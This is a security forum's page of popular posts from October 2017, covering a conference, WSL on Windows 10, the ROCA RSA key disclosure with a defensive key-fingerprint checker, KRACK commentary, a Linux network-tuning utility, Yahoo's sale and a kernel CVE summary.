Leaderboard
Popular Content
Showing content with the highest reputation on 10/17/17 in all areas
-
The conference is over; my personal opinion is that it was somewhat more successful than in previous years. More people, a nicer venue, CTFs, trainings, 2 presentation tracks... Speaking of presentations, RST was represented in 2 talks: Less Known Web Application Vulnerabilities, Ionut Popescu; Man-in-the-browser attacks, Daniel Tomescu. Most of the presentations have been published on the event page, here and here.
4 points
-
LMFAO - http://www.newsweek.com/trump-team-leaks-about-israels-hack-kaspersky-lab-could-further-damage-ties-686500 Like in a dumb comedy... The Americans spy on the world, but in turn they are spied on by the Russians, who in turn are spied on by the Israelis; but when the latter tell the Americans about it, the Americans start trumpeting it.
2 points
-
Sysadmins and developers rejoice! WSL is now a fully fledged part of Windows 10, starting with the latest Fall Creators Update.

Interested in running Linux on Windows 10 with Windows Subsystem for Linux (WSL), but nervous about it being both a beta and only available in Windows 10 developer mode? Your worries are over. In the Windows 10 Fall Creators Update (WinFCU) WSL has graduated to being a Windows 10 feature that can be run by any user.

Tested for over a year, WSL on WinFCU is bringing many new features to this combination of the Linux Bash shell and Windows. Besides WSL no longer being a beta or requiring users to be in developer mode, the new features include:

- Install Linux distros via the Windows Store
- WSL now runs multiple Linux distros
- WSL comes to Windows Server & Microsoft Azure VMs
- WSL now supports USB/serial comms
- Miscellaneous fixes and improvements

Besides Ubuntu, the new WSL-supported Linux distros are SUSE's community openSUSE and its corporate SUSE Linux Enterprise Server (SLES). Fedora and other distros will arrive in the store shortly.

If you've previously installed WSL, your existing "legacy" Ubuntu instance will continue to work, but it's deprecated. To continue to receive support you should replace it with a new store-delivered instance. Without this, you won't receive Canonical or Microsoft support. To keep your old files, you should tar them and copy them to your Windows file system; for example: `/mnt/c/temp/backups`, and then copy them back to your new instance.

In addition, instead of jumping through hoops to install Linux on Windows, you can install one or more -- yes, you can have multiple distros on a single Windows 10 system -- Linux distros from the Windows Store. To do this, you must first enable the WSL feature in the "Turn Windows Features on or off" dialog and reboot. No, WSL is not active by default and yes, you must reboot.

After rebooting you simply search for "Linux" in the Windows Store, pick a version to install, hit install, and in a few minutes you're good to go. If you already have a Bash instance installed on WSL, you can start afresh with the `lxrun /uninstall` command. You run this command from the command prompt or PowerShell.

Besides being able to install multiple Linux distributions, you can simultaneously run one or more Linux distros. Each distro runs independently of one another. These are neither virtual machines (VMs) nor containers, and that means they need their usual system resources. I, for example, would only want them on systems with at least an additional 2GB per instance of running WSL.

WSL itself requires only minimal system resources. Rich Turner, Microsoft's senior program manager of WSL and Windows Console, wrote: "We don't list [RAM requirements] because, frankly, we don't have any of note! If you don't install WSL, we add no RAM footprint. If you do enable WSL, there's a tiny 850KB driver loaded briefly, and then it shuts down until you start a Linux instance. At that point, you load /init which launches /bin/bash. This causes the 850KB driver to load, and creates Pico Processes for init and bash. So, basically, WSL's RAM requirements are pretty much whatever the RAM is that you need to run each Linux binary, plus around 1MB of working set in total."

The Linux distros can also access Windows' host filesystem, networking stack, etc. That means you should be cautious about changing files on the Windows filesystem.

Why would you run multiple distros at once? Microsoft points out: You can now install Linux distros right from the Windows Store.

Linux developers will be pleased to find that USB serial comms are now supported. This enables your shell scripts and apps to talk to serial ports. WSL also now supports mounting of USB-attached storage devices and network shares. That's the good news. The bad news is it only supports the NT filesystem IO infrastructure. In other words it only supports FAT/FAT32/NTFS formatted storage devices. Want *nix file systems? Microsoft encourages you to upvote and/or comment on the associated UserVoice ask.

Digging deeper into the new improvements, under the hood WSL on WinFCU now includes:

- Improved TCP socket options inc. IP_OPTIONS, IP_ADD_MEMBERSHIP, IP_MULTICAST, etc.
- /etc/hosts will now inherit entries from the Windows hosts file
- xattr related syscalls support
- Fixed several filesystem features and capabilities
- Improved PTRACE support
- Improved FUTEX support
- chsh, which enables you to change shells, now works. This enables you to use your favorite shell directly.
- Shell startup files other than ".bashrc" will now execute.

The following syscalls were added for the first time during the FCU cycle:

- Prlimit64
- getxattr, setxattr, listxattr, removexattr

As expected, WSL is also on its way to Windows Server and to Microsoft Azure Windows VM instances. This will make WSL even more useful for sysadmins.

All these improvements have made it even easier for developers and system administrators to run Linux shell commands on Windows. While this isn't very useful for ordinary desktop users, for serious IT staff it's a real step forward, making Windows more useful in a server and cloud world that's increasingly dominated by Linux. Even on Azure, over a third of VMs are Linux.

With WSL, most Linux shell tools are at your command. These include: apt, ssh, find, grep, awk, sed, gpg, wget, tar, vim, emacs, diff, and patch. You can also run popular open-source programming languages such as python, perl, ruby, php, and gcc. In addition, WSL and Bash support server programs such as the Apache web server and Oracle's MySQL database management system. In other words, you get a capable Linux development environment running on Windows.

While you can run Linux graphical interfaces and programs on WSL, it's more of a stunt than a practical approach at this time. Of course, with a little work...

How does WSL work? Dustin Kirkland, a member of Canonical's Ubuntu Product and Strategy executive team, explained: "We're talking about bit-for-bit, checksum-for-checksum Ubuntu ELF binaries running directly in Windows. [WSL] basically perform real-time translation of Linux syscalls into Windows OS syscalls. Linux geeks can think of it sort of the inverse of 'WINE' -- Ubuntu binaries running natively in Windows."

Regardless of the technical details of how WSL does what it does, what matters now is that WSL works very, very well. Enjoy!

Via zdnet.com
2 points
-
A newly discovered vulnerability in generation of RSA keys used by a software library adopted in cryptographic smartcards, security tokens and other secure hardware chips manufactured by Infineon Technologies AG allows for a practical factorization attack, in which the attacker computes the private part of an RSA key. The attack is feasible for commonly used key lengths, including 1024 and 2048 bits, and affects chips manufactured as early as 2012, that are now commonplace. Assess your keys now with the provided offline and online detection tools and contact your vendor if you are affected. Major vendors including Microsoft, Google, HP, Lenovo, Fujitsu already released the software updates and guidelines for a mitigation. Full details including the factorization method will be released in 2 weeks at the ACM CCS conference as 'The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli' (ROCA) research paper.

Description of the vulnerability

A security vulnerability was found in the implementation of RSA keypair generation in a cryptographic library used in a wide range of cryptographic chips produced by Infineon Technologies AG. The product is also integrated in authentication, signature and encryption tokens of other vendors and chips used for Trusted Boot of operating systems. The vulnerability is present in NIST FIPS 140-2 and CC EAL 5+ certified devices since at least the year 2012. The algorithmic vulnerability is characterized by a specific structure of the generated RSA primes, which makes factorization of commonly used key lengths including 1024 and 2048 bits practically possible. Only the knowledge of a public key is necessary and no physical access to the vulnerable device is required. The vulnerability does NOT depend on a weak or a faulty random number generator - all RSA keys generated by a vulnerable chip are impacted.

The attack was practically verified for several randomly selected 1024-bit RSA keys and for several selected 2048-bit keys. The specific structure of the primes in question allows for a fast detection of vulnerable keys, even in very large datasets. This property is useful for mitigation (users can assess their own keys for vulnerability), but also for potential attackers (keys vulnerable to factorization can be pre-selected, without undergoing time-consuming factorization attempts). The worst cases for the factorization of 1024 and 2048-bit keys are less than 3 CPU-months and 100 CPU-years, respectively, on a single core of a common recent CPU, while the expected time is half of that of the worst case. The factorization can be easily parallelized on multiple CPUs. Where k CPUs are available, the wall time required for the attack will be reduced k-times - allowing for practical factorization in order of hours or days. The worst-case price of the factorization on an Amazon AWS c4 computation instance is $76 for the 1024-bit key and about $40,000 for the 2048-bit key. The difficulty of the factorization attack is not the same for all key lengths and is NOT strictly increasing (some longer keys may take less time to factorize than other shorter ones). The following key length ranges are now considered practically factorizable (time complexity between hours to 1000 CPU years at maximum): 512 to 704 bits, 992 to 1216 bits and 1984 to 2144 bits. Note that a 4096-bit RSA key is not practically factorizable now, but may become so, if the attack is improved. The time complexity and cost for the selected key lengths (Intel E5-2650 v3@3GHz Q2/2014):

- 512 bit RSA keys - 2 CPU hours (the cost of $0.06);
- 1024 bit RSA keys - 97 CPU days (the cost of $40-$80);
- 2048 bit RSA keys - 140.8 CPU years (the cost of $20,000 - $40,000).

The vulnerability was found by a close inspection of a large number of RSA keys generated and exported from the manufacturer smartcards by researchers at CRoCS laboratory, Masaryk University, Enigma Bridge and Ca' Foscari University. The full results will be presented at an academic ACM Conference on Computer and Communications Security (ACM CCS '17) starting from October 30th. The vulnerability was disclosed to Infineon Technologies AG, following the responsible disclosure principle, in the first week of February with agreement of an 8 month period before a public disclosure. We cooperated with the manufacturer and other affected parties to help evaluate and mitigate this vulnerability during this period. Major vendors including Microsoft, Google, HP, Lenovo, Fujitsu already released the software updates and guidelines for a mitigation. We are now notifying the general public and releasing tools for assessment of the individual keys.

Impact

A remote attacker can compute an RSA private key from the value of a public key. The private key can be misused for impersonation of a legitimate owner, decryption of sensitive messages, forgery of signatures (such as for software releases) and other related attacks. The actual impact of the vulnerability depends on the usage scenario, availability of the public keys and the lengths of keys used. We found and analyzed vulnerable keys in various domains including electronic citizen documents, authentication tokens, trusted boot devices, software package signing, TLS/HTTPS keys and PGP. The currently confirmed number of vulnerable keys found is about 760,000 but possibly up to two to three magnitudes more are vulnerable. The details will be presented in two weeks at the ACM CCS conference. The vulnerable chips are pervasive and not necessarily sold directly by Infineon Technologies AG, as the chips can be embedded inside devices of other manufacturers.

Detection tools, mitigation and workarounds

The first step is to detect if you use a chip with the vulnerable library. As the vulnerability is present in the on-chip software library and not limited just to a particular batch of hardware, the only reliable way is to generate an RSA keypair on the device and test the public key by the provided tools (see below). It is recommended to test also the keys already in use. We believe the tools are very accurate - it is highly unlikely that a secure key would be flagged, as well as that a vulnerable key would be missed. We provide the following tools:

- Offline testers: Python/Java/C++ applications and tutorials (https://github.com/crocs-muni/roca). We release all offline tools under the MIT license so they can be embedded into other testing applications and services.
- Online testers: Upload public key to https://keychest.net/roca or https://keytester.cryptosense.com to test your key.
- Email S/MIME/PGP tester: Send a signed email to roca@keychest.net to obtain an automatic email response with the analysis of the signing key vulnerability.

If a vulnerable key is found, then you should contact your device vendor for further advice. The following general advice may apply:

- Apply the software update if available.
- Replace the device with one without the vulnerable library.
- Generate a secure RSA keypair outside the device (e.g., via the OpenSSL library) and import it to the device. We are not aware of any vulnerability in connection with the actual use of the key; only the generation phase has a confirmed vulnerability.
- Use another cryptographic algorithm (e.g., ECC) instead of RSA on affected devices.
- Apply additional risk management within your environment, if the RSA key in use is detected as vulnerable.
- Use key lengths which are not currently impacted (e.g., 3936 bits) by our factorization method. Be aware: use this specific mitigation only as a last resort, as the attack may be improved.

Team

The vulnerability was discovered by Slovak and Czech security researchers from the Centre for Research on Cryptography and Security at Masaryk University, Czech Republic; Enigma Bridge Ltd, Cambridge, UK; and Ca' Foscari University of Venice, Italy.

Updates

- 2nd of November 2017 - Presentation of all details at the ACM CCS conference (to come)
- 16th of October 2017 - The initial version of the public disclosure published
- May to October 2017 - Cooperation with the manufacturer and other affected parties to help evaluate and mitigate the vulnerability
- 1st of February - The vulnerability disclosed to Infineon Technologies AG
- End of January - The vulnerability found

Q&A

Technical references

- Infineon, Information on software update of RSA key generation function: https://www.infineon.com/RSA-update
- Infineon, Information on TPM firmware update for Microsoft Windows systems: https://www.infineon.com/cms/en/product/promopages/tpm-update/?redirId=59160
- Microsoft, Vulnerability in TPM could allow Security Feature Bypass: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170012
- Google, The Chromium project, Trusted Platform Module firmware vulnerability: https://sites.google.com/a/chromium.org/dev/chromium-os/tpm_firmware_update

Media

- ArsTechnica: https://arstechnica.com/information-technology/2017/10/crypto-failure-cripples-millions-of-high-security-keys-750k-estonian-ids/
- Forbes: https://www.forbes.com/sites/thomasbrewster/2017/10/16/worse-than-krack-google-and-microsoft-patch-massive-5-year-old-encryption-hole/#40c81a9447c3
- Estonian ID cards: http://news.err.ee/616732/potential-security-risk-could-affect-750-000-estonian-id-cards
- The Register: https://www.theregister.co.uk/2017/10/16/roca_crypto_vuln_infineon_chips/

Paper details

Paper title: The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli [ACM CCS 2017]
Authors: Matus Nemec, Marek Sys, Petr Svenda, Dusan Klinec and Vashek Matyas
Primary contact: Petr Svenda svenda@fi.muni.cz
Conference page: ACM CCS 2017
Download author pre-print of the paper: (to be released 2nd November)
Bibtex (regular paper):

```bibtex
@inproceedings{2017-ccs-nemec,
  Author = {Matus Nemec and Marek Sys and Petr Svenda and Dusan Klinec and Vashek Matyas},
  Title = {The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli},
  BookTitle = {to appear at 24th ACM Conference on Computer and Communications Security (CCS'2017)},
  Year = {2017},
  ISBN = {978-1-4503-4946-8/17/10},
  Publisher = {ACM}
}
```

Source
2 points
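The residue test that the offline testers above apply fits in a few lines. What follows is an added example written for this page, not the crocs-muni/roca project's own roca-detect code. It assumes the published structure of the affected primes (p = k*M + 65537^a mod M, with M a primorial) and that the first 39 primes divide every M the library uses; the DER helpers and the sample moduli are constructed for illustration and are not real keys.

```python
# Added example (not the ROCA project's roca-detect): a minimal reimplementation
# of the public fingerprint the offline testers apply.
# Assumed structure of the flaw: the affected library builds primes as
# p = k*M + (65537^a mod M) for a primorial M, so for every small prime r
# dividing M the modulus N = p*q satisfies N mod r == 65537^(a+b) mod r, i.e.
# N mod r lies in the subgroup of Z_r* generated by 65537. A modulus failing
# that for any r cannot come from the flawed generator; one passing for all 39
# primes tested here is flagged as vulnerable.

GENERATOR = 65537

# First 39 primes; their product divides each M the affected library uses,
# so a single residue table serves all key sizes.
SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59,
                61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127,
                131, 137, 139, 149, 151, 157, 163, 167]


def _powers_of_generator(r):
    """All values 65537^k mod r: the residues a fingerprinted modulus may take."""
    seen, x = set(), 1
    while x not in seen:
        seen.add(x)
        x = (x * GENERATOR) % r
    return frozenset(seen)


ALLOWED = {r: _powers_of_generator(r) for r in SMALL_PRIMES}


def first_rejecting_prime(n):
    """Return the first small prime whose residue class rules n out, or None
    when n passes every test (i.e. carries the fingerprint)."""
    for r in SMALL_PRIMES:
        if n % r not in ALLOWED[r]:
            return r
    return None


def roca_fingerprint(n):
    """True when the RSA modulus n has the structure of a ROCA-affected key."""
    return first_rejecting_prime(n) is None


# --- minimal DER helpers so the check can run on a PKCS#1 RSAPublicKey ---
# (the shape `openssl rsa -pubin -RSAPublicKey_out -outform DER` produces)

def _der_len(n):
    if n < 0x80:
        return bytes([n])
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(lb)]) + lb


def _der_int(v):
    # (bit_length + 8) // 8 keeps a leading 0x00 when the top bit is set
    b = v.to_bytes((v.bit_length() + 8) // 8, "big")
    return b"\x02" + _der_len(len(b)) + b


def pkcs1_der(n, e):
    """Encode RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }."""
    body = _der_int(n) + _der_int(e)
    return b"\x30" + _der_len(len(body)) + body


def _read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits give the count of length bytes
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, buf[pos:pos + length], pos + length


def modulus_from_pkcs1_der(der):
    """Extract n from a DER RSAPublicKey; raises ValueError on other input."""
    tag, body, _ = _read_tlv(der, 0)
    if tag != 0x30:
        raise ValueError("not a SEQUENCE")
    tag, n_bytes, _ = _read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("modulus INTEGER missing")
    return int.from_bytes(n_bytes, "big")


if __name__ == "__main__":
    # Constructed inputs: a pure power of 65537 necessarily passes every residue
    # test; a Mersenne number is ruled out at r = 11 (residue 6, allowed {1, 10}).
    for n in (GENERATOR ** 7, (1 << 127) - 1):
        der = pkcs1_der(n, 65537)
        m = modulus_from_pkcs1_der(der)
        print(f"{m.bit_length()}-bit modulus: fingerprint={roca_fingerprint(m)}, "
              f"rejected by r={first_rejecting_prime(m)}")
```

The check is cheap (39 modular reductions per key), which is why it scales to very large key sets, and it never needs the private half: a positive result only tells you to rotate the key, not how to factor it.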
-
[...] So unless your Wi-Fi password looks something like a cat's hairball (e.g. ":SNEIufeli7rc" -- which is not guessable with a few million tries by a computer), a local attacker had the capability to determine the password, decrypt all the traffic, and join the network before KRACK.

KRACK is, however, relevant for enterprise Wi-Fi networks: networks where you needed to accept a cryptographic certificate to join initially and have to provide both a username and password. KRACK represents a new vulnerability for these networks. Depending on some esoteric details, the attacker can decrypt encrypted traffic and, in some cases, inject traffic onto the network. But in none of these cases can the attacker join the network completely. And the most significant of these attacks affects Linux devices and Android phones; they don't affect Macs, iPhones, or Windows systems. Even when feasible, these attacks require physical proximity: An attacker on the other side of the planet can't exploit KRACK, only an attacker in the parking lot can. [...]

Nicholas Weaver

[...] One of the problems with IEEE is that the standards are highly complex and get made via a closed-door process of private meetings. More importantly, even after the fact, they're hard for ordinary security researchers to access. Go ahead and google for the IETF TLS or IPSec specifications -- you'll find detailed protocol documentation at the top of your Google results. Now go try to Google for the 802.11i standards. I wish you luck. The IEEE has been making a few small steps to ease this problem, but they're hyper-timid incrementalist bullshit. There's an IEEE program called GET that allows researchers to access certain standards (including 802.11) for free, but only after they've been public for six months -- coincidentally, about the same time it takes for vendors to bake them irrevocably into their hardware and software. This whole process is dumb and -- in this specific case -- probably just cost industry tens of millions of dollars. It should stop. [...]

Matthew Green
2 points
-
And then, after the sale went through: https://www.sec.gov/Archives/edgar/data/732712/000073271217000003/a2017_10x3xoathxexhibitx991.htm Hmm...
2 points
-
The patches have been available for years...
2 points
-
The rise of automation / robotisation in various fields is almost always presented apocalyptically, although that is not the case. The main role of automation is to help people carry out their activities, not to replace them. Repetitive activities, devoid of creativity, devoid of humanity, can be automated. That way people can focus more on research, creativity, the arts, sports, personal development, etc. Yes, some jobs will disappear. Others will transform. But if your day-to-day work can be replaced by AI and little robots, then you are probably already wasting your life on monotonous activities devoid of creativity...
2 points
-
You underestimate the survival instinct of bacteria/parasites. They always find a host to latch onto and on whose back to multiply. But they too are somewhat necessary for the evolution of the species (except for some of those swarming around here on the forum)
2 points
-
Paper - https://papers.mathyvanhoef.com/ccs2017.pdf
1 point
-
A suite of utilities simplifying Linux networking stack performance troubleshooting and tuning. https://pypi.python.org/pypi/netutils-linux

netutils-linux

It's a set of useful utils to simplify Linux network troubleshooting and performance tuning, developed in order to help Carbon Reductor techsupport and automate the whole Linux performance tuning process out of the box (ok, except the best RSS layout detection with multiple network devices). These utils may be useful for datacenters and internet service providers with heavy network workload (you probably wouldn't see an effect on your desktop computer). It's now in production usage with 300+ deployments and saves us a lot of time with hardware and software settings debugging. Inspired by packagecloud's blog post.

Installation

You'll need pip.

```
pip install netutils-linux
```

Utils

Monitoring

All these top-like utils don't require root privileges or sudo usage. So you can install and use them as a non-privileged user if you care about security.

```
pip install --user netutils-linux
```

Brief explanation about highlighting colors for CPU and device groups: green and red are for NUMA nodes, blue and yellow for CPU sockets. Screenshots are taken from different hosts with different hardware.

network-top

Most useful util in this repo that includes almost all Linux network stack performance metrics and allows monitoring interrupts, soft interrupts, and network processing statistics for devices and CPUs. Based on the following files:

- /proc/interrupts (vectors with a small amount of irqs/second are hidden by default)
- /proc/net/softnet_stat - packet distribution and errors/squeeze rate between CPUs.
- /proc/softirqs (only NET_RX and NET_TX values).
- /sys/class/net/<NET_DEVICE>/statistics/<METRIC> files (you can specify units, mbits are default)

There are also separate utils if you want to look at only specific metrics: irqtop, softirq-top, softnet-stat-top, link-rate.

snmptop

Basic /proc/net/snmp file watcher.

Tuning

rss-ladder

Automatically sets smp_affinity_list for the IRQs of NIC rx/tx queues (that usually work on CPU0 out of the box). Based on lscpu's output. It also supports double/quad ladder in case of multiprocessor systems (but you'd better explicitly specify queue count == cores per socket as the NIC driver's param).

Example output:

```
# rss-ladder eth1 0
- distributing interrupts of eth1 (-TxRx-) on socket 0
  - eth1: irq 67 eth1-TxRx-0 -> 0
  - eth1: irq 68 eth1-TxRx-1 -> 1
  - eth1: irq 69 eth1-TxRx-2 -> 2
  - eth1: irq 70 eth1-TxRx-3 -> 3
  - eth1: irq 71 eth1-TxRx-4 -> 8
  - eth1: irq 72 eth1-TxRx-5 -> 9
  - eth1: irq 73 eth1-TxRx-6 -> 10
  - eth1: irq 74 eth1-TxRx-7 -> 11
```

autorps

Enables RPS on all available CPUs of the NUMA node local to the NIC for all of the NIC's rx queues. It may be good for small servers with cheap network cards. You can also explicitly pass --cpus or --cpu-mask.

Example output:

```
# autorps eth0
Using mask 'fc0' for eth0-rx-0.
```

maximize-cpu-freq

Sets every CPU scaling governor mode to performance and sets the max scaling value for the min scaling value. So you will be able to use all the power of your processor (useful for latency sensitive systems).

rx-buffers-increase

rx-buffers-increase finds and sets a compromise value between avoiding dropped/missing pkts and keeping latency low.

Example output:

```
# ethtool -g eth1
Ring parameters for eth1:
Pre-set maximums:
RX:             4096
...
Current hardware settings:
RX:             256

# rx-buffers-increase eth1
run: ethtool -G eth1 rx 2048

# rx-buffers-increase eth1
eth1's rx ring buffer already has fine size.

# ethtool -g eth1
Ring parameters for eth1:
Pre-set maximums:
RX:             4096
...
Current hardware settings:
RX:             2048
```

Hardware and its configuration rating

server-info

Much alike lshw but designed for the network processing role of a server.

```
# server-info show
cpu:
  info:
    Architecture: x86_64
    BogoMIPS: 6799.9899999999998
    Byte Order: Little Endian
    CPU MHz: 3399.998
    CPU family: 6
    CPU op-mode(s): 32-bit, 64-bit
    CPU(s): 2
    Core(s) per socket: 1
    Hypervisor vendor: KVM
    L1d cache: 32K
    L1i cache: 32K
    L2 cache: 4096K
    Model: 13
    Model name: QEMU Virtual CPU version (cpu64-rhel6)
    NUMA node(s): 1
    NUMA node0 CPU(s): 0,1
    On-line CPU(s) list: 0,1
    Socket(s): 2
    Stepping: 3
    Thread(s) per core: 1
    Vendor ID: GenuineIntel
    Virtualization type: full
  layout:
    '0': '0'
    '1': '1'
disk:
  sr0:
    model: QEMU DVD-ROM
  vda:
    model: null
    size: 64424509440
    type: HDD
memory:
  MemFree: 158932
  MemTotal: 1922096
  SwapFree: 4128764
  SwapTotal: 4128764
net:
  eth1:
    buffers:
      cur: 2048
      max: 4096
    conf:
      ip: 10.144.63.1/24
      vlan: true
    driver:
      driver: e1000
      version: 7.3.21-k8-NAPI
    queues:
      own: []
      rx: []
      rxtx: []
      shared:
      - virtio1, eth0, eth1
      tx: []
      unknown: []
```

It also can rate hardware and its features in a range of 1..10.

```
# server-info rate
cpu:
  BogoMIPS: 7
  CPU MHz: 7
  CPU(s): 1
  Core(s) per socket: 1
  L3 cache: 1
  Socket(s): 10
  Thread(s) per core: 10
  Vendor ID: 10
disk:
  sr0:
    size: 1
    type: 2
  vda:
    size: 1
    type: 1
memory:
  MemTotal: 1
  SwapTotal: 10
net:
  eth1:
    buffers:
      cur: 5
      max: 10
    driver: 1
    queues: 1
system:
  Hypervisor vendor: 1
  Virtualization type: 1
```

Download: netutils-linux-master.zip or:

```
git clone https://github.com/strizhechenko/netutils-linux.git
```

Source: https://github.com/strizhechenko/netutils-linux
1 point
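To make concrete what the rss-ladder mapping above amounts to, here is an added dry-run planner written for this page; it is not netutils-linux's own code. It assumes the common `<dev>-<kind>-<n>` vector naming seen in the README's output (eth1-TxRx-3, eth0-rx-0), reads the CPU-to-socket layout from `lscpu -p=cpu,core,socket,node`, and only writes to /proc/irq when `apply_ladder` is called explicitly; the /proc/interrupts and lscpu samples are constructed, not captured from a real host.

```python
# Added example, not code from the netutils-linux project: plan (and optionally
# apply) the same IRQ-to-CPU "ladder" that the README shows rss-ladder producing.
import re
from pathlib import Path

# Constructed /proc/interrupts excerpt (not captured from a real host); only the
# IRQ number (first column) and the action name (last column) are used.
SAMPLE_INTERRUPTS = """\
           CPU0       CPU1       CPU2       CPU3
  24:          0          0          0          0   IO-APIC-edge      timer
  67:     904122          0          0          0   PCI-MSI-edge      eth1-TxRx-0
  68:     898710          0          0          0   PCI-MSI-edge      eth1-TxRx-1
  69:     911004          0          0          0   PCI-MSI-edge      eth1-TxRx-2
  70:     887345          0          0          0   PCI-MSI-edge      eth1-TxRx-3
  71:     901990          0          0          0   PCI-MSI-edge      eth1-TxRx-4
  72:     893412          0          0          0   PCI-MSI-edge      eth1-TxRx-5
  73:     905551          0          0          0   PCI-MSI-edge      eth1-TxRx-6
  74:     899873          0          0          0   PCI-MSI-edge      eth1-TxRx-7
  75:       1034          0          0          0   PCI-MSI-edge      eth0-rx-0
 NMI:          0          0          0          0   Non-maskable interrupts
"""

# Constructed `lscpu -p=cpu,core,socket,node` output: two sockets whose CPU ids
# are interleaved in blocks of four, which gives the 0-3, 8-11 layout seen in
# the README's rss-ladder output for socket 0.
SAMPLE_LSCPU = """\
# The following is the parsable format, which can be fed to other
# programs. Each different item in every column has an unique ID
# starting from zero.
# CPU,Core,Socket,Node
0,0,0,0
1,1,0,0
2,2,0,0
3,3,0,0
4,4,1,1
5,5,1,1
6,6,1,1
7,7,1,1
8,8,0,0
9,9,0,0
10,10,0,0
11,11,0,0
12,12,1,1
13,13,1,1
14,14,1,1
15,15,1,1
"""

# "<irq>:" then one counter per CPU, then chip/type columns, then the action name.
IRQ_LINE = re.compile(r"^\s*(\d+):\s+(?:\d+\s+)+.*?(\S+)\s*$")


def nic_queue_irqs(interrupts_text, dev):
    """Return [(irq, vector_name, queue_index)] for dev's queue vectors, sorted
    by queue index. Assumes '<dev>-<kind>-<n>' naming; other schemes are skipped."""
    queue_re = re.compile(rf"^{re.escape(dev)}-\w+-(\d+)$")
    found = []
    for line in interrupts_text.splitlines():
        m = IRQ_LINE.match(line)
        if not m:
            continue
        irq, name = int(m.group(1)), m.group(2)
        q = queue_re.match(name)
        if q:
            found.append((irq, name, int(q.group(1))))
    return sorted(found, key=lambda t: t[2])


def socket_cpus(lscpu_text):
    """Map socket id -> ordered list of CPU ids from `lscpu -p` output."""
    sockets = {}
    for line in lscpu_text.splitlines():
        if not line or line.startswith("#"):
            continue
        cpu, _core, socket, _node = (int(x) for x in line.split(","))
        sockets.setdefault(socket, []).append(cpu)
    return sockets


def plan_ladder(interrupts_text, lscpu_text, dev, socket):
    """Assign queue i of dev to the i-th CPU of the socket, wrapping around when
    there are more queues than cores (the case the README advises avoiding).
    Returns [(irq, vector_name, cpu)] without touching the system."""
    cpus = socket_cpus(lscpu_text)[socket]
    return [(irq, name, cpus[q % len(cpus)])
            for irq, name, q in nic_queue_irqs(interrupts_text, dev)]


def apply_ladder(plan, proc_irq=Path("/proc/irq")):
    """Write the plan to /proc/irq/<irq>/smp_affinity_list (needs root).
    Returns the paths written so the caller can log or verify them."""
    written = []
    for irq, _name, cpu in plan:
        target = proc_irq / str(irq) / "smp_affinity_list"
        target.write_text(f"{cpu}\n")
        written.append(target)
    return written


if __name__ == "__main__":
    # Dry run on the constructed samples; prints the same shape as rss-ladder.
    print("- distributing interrupts of eth1 (-TxRx-) on socket 0")
    for irq, name, cpu in plan_ladder(SAMPLE_INTERRUPTS, SAMPLE_LSCPU, "eth1", 0):
        print(f"  - eth1: irq {irq} {name} -> {cpu}")
```

On a real host you would read `/proc/interrupts` and the output of `lscpu -p=cpu,core,socket,node` instead of the samples, review the plan, and only then call `apply_ladder`; keeping the planning step pure is what makes the mapping easy to test and to diff against what the driver left in place.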
-
the guy posted a picture of a tablet, not a fridge
1 point
-
Yahoo is gone, its remains become Altaba
by unacomn on 10/01/2017

The acquisition of Yahoo by the American telecommunications conglomerate Verizon has been completed. This deal has been in progress since last summer, going over a few bumps since then, after Yahoo revealed that it had twice been the victim of the largest hacking incident in the history of the internet, with half a billion accounts initially compromised, and then a whole billion. Still, despite the general outrage at how Yahoo handled the incident, the acquisition was not affected, and Verizon paid 4.8 billion dollars for what was once the most valuable internet company in the world. After this acquisition, all of Yahoo's main functions will pass under Verizon's wing, while the company's investments in Alibaba and other Asian companies will be consolidated under the name Altaba. This component will remain independent and in effect represents everything left of Yahoo that is not Verizon's property. Yahoo's current leadership has cleared out: Marissa Mayer is no longer CEO, company co-founder David Filo is no longer there, and a large part of everyone else who guided the company to its precarious situation will now be looking for other jobs. Yahoo's services will remain operational, if anyone still uses them. [Ars Technica]

Source: https://zonait.tv/yahoo-nu-mai-exista/
1 point
-
Security researchers have discovered a new privilege-escalation vulnerability in the Linux kernel that could allow a local attacker to execute code on the affected systems with elevated privileges.

Discovered by Venustech ADLab (Active-Defense Lab) researchers, the Linux kernel vulnerability (CVE-2017-15265) is due to a use-after-free memory error in the Advanced Linux Sound Architecture (ALSA) sequencer interface of the affected application. The Advanced Linux Sound Architecture (ALSA) provides audio and MIDI functionality to the Linux operating system, and also bundles a userspace driven library for application developers, enabling direct (kernel) interaction with sound devices through ALSA libraries.

Successful exploitation of this vulnerability requires an attacker, with local access on the targeted system, to execute a maliciously crafted application on a targeted system, which allows the attacker to elevate his privilege to root on the targeted system, a Cisco advisory warned.

The vulnerability affects major distributions of the Linux operating system including RedHat, Debian, Ubuntu, and Suse, and is triggered by a slip in snd_seq_create_port(). The vulnerability has been patched in Linux kernel version 4.13.4-2, which was fixed just by taking the refcount properly at "snd_seq_create_port()" and letting the caller unref the object after use.

Administrators are advised to apply the appropriate updates on their Linux distributions as soon as they receive them from their respective distro. They're also recommended to allow only trusted users to access local systems and always monitor affected systems.

This flaw is yet another privilege escalation vulnerability recently uncovered in the Linux kernel. Last month, a high-risk 2-year-old potential local privilege escalation flaw was patched in the Linux kernel that affected all major Linux distributions, including Red Hat, Debian, and CentOS. In February, another privilege-escalation vulnerability that dates back to 2011 was disclosed and patched in the Linux kernel, which also affected major Linux distros, including Redhat, Debian, OpenSUSE, and Ubuntu.

Via thehackernews.com
1 point
-
